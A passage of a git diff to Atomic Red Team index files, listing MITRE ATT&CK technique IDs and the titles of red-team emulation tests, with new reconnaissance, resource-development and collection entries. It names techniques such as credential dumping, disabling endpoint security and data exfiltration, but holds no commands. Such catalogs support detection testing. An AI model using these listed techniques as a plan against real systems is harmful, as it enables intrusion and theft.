Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # execution - [T1059.002 AppleScript](../../T1059.002/T1059.002.md) - Atomic Test #1: AppleScript [macos] @@ -1094,6 +1272,7 @@ - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] +- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1059.001 PowerShell](../../T1059.001/T1059.001.md) - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: Run BloodHound from local disk [windows] @@ -1119,6 +1298,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.002 Service Execution](../../T1569.002/T1569.002.md) @@ -1128,6 +1308,7 @@ - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - Atomic Test #2: Command-Line Interface [macos, linux] @@ -1135,6 +1316,7 @@ - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md) - Atomic Test #1: Visual Basic script execution to gather local computer information [windows] - Atomic Test #2: Encoded VBS code execution [windows] + - Atomic Test #3: Extract Memory via VBA [windows] - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) @@ -1259,69 +1441,6 @@ - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# collection -- [T1560 Archive Collected Data](../../T1560/T1560.md) - - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] -- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) - - Atomic Test #1: Compress Data for Exfiltration With Rar [windows] - - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] - - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] - - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] -- [T1123 Audio Capture](../../T1123/T1123.md) - - Atomic Test #1: using device audio capture commandlet [windows] -- [T1119 Automated Collection](../../T1119/T1119.md) - - Atomic Test #1: Automated Collection Command Prompt [windows] - - Atomic Test #2: Automated Collection PowerShell [windows] - - Atomic Test #3: Recon information for export with PowerShell [windows] - - Atomic Test #4: Recon information for export with Command Prompt [windows] -- [T1115 Clipboard Data](../../T1115/T1115.md) - - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] - - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows] - - Atomic Test #3: Execute commands from clipboard [macos] -- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - - Atomic Test #1: AppleScript - Prompt User for Password [macos] - - Atomic Test #2: PowerShell - Prompt User for Password [windows] -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - - Atomic Test #1: Input Capture [windows] -- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - - Atomic Test #1: Stage data from Discovery.bat [windows] - - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] -- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md) - - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] -- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1113 Screen Capture](../../T1113/T1113.md) - - Atomic Test #1: Screencapture [macos] - - Atomic Test #2: Screencapture (silent) [macos] - - Atomic Test #3: X Windows Capture [linux] - - Atomic Test #4: Capture Linux Desktop using Import Tool [linux] - - Atomic Test #5: Windows Screencapture [windows] -- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # exfiltration - [T1020 Automated Exfiltration](../../T1020/T1020.md) - Atomic Test #1: IcedID Botnet HTTP PUT [windows] @@ -1345,6 +1464,7 @@ - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # initial-access diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 282b47c5..090af769 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -7,6 +7,7 @@ - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -38,6 +39,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.005 Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap [macos, linux] - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -50,10 +52,11 @@ - T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] @@ -93,6 +96,7 @@ - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) @@ -101,6 +105,8 @@ - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] +- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.005 Trap](../../T1546.005/T1546.005.md) @@ -112,6 +118,7 @@ - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - Atomic Test #2: Access /etc/passwd (Local) [linux] +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -126,6 +133,7 @@ - T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -145,6 +153,44 @@ - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# collection +- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) + - Atomic Test #5: Data Compressed - nix - zip [linux, macos] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux] +- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) + - Atomic Test #2: Stage data from Discovery.sh [linux, macos] +- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1113 Screen Capture](../../T1113/T1113.md) + - Atomic Test #3: X Windows Capture [linux] + - Atomic Test #4: Capture Linux Desktop using Import Tool [linux] +- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -171,6 +217,8 @@ - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable iptables firewall [linux] @@ -180,6 +228,7 @@ - Atomic Test #3: Disable SELinux [linux] - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -189,14 +238,14 @@ - Atomic Test #3: Overwrite and delete a file with shred [linux] - Atomic Test #8: Delete Filesystem - Linux [linux] - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md) - - Atomic Test #1: Disable history collection [linux, macos] - - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) + - Atomic Test #1: Disable history collection [linux, macos] + - Atomic Test #2: Mac HISTCONTROL [macos, linux] - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] @@ -225,14 +274,21 @@ - T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] +- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #2: Masquerading as Linux crond process. [linux] @@ -256,6 +312,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1497.001 System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070.006 Timestomp](../../T1070.006/T1070.006.md) - Atomic Test #1: Set a file's access timestamp [linux, macos] @@ -266,9 +323,11 @@ - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # impact @@ -296,6 +355,7 @@ - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux] - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux] @@ -313,6 +373,7 @@ - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -368,6 +429,83 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# resource-development +- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + +# reconnaissance +- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1598.001 Spearphishing Service 